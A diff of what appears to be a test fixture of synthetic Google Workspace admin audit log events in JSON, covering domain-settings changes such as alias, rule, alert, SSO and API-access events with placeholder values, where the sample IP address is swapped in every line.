-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} 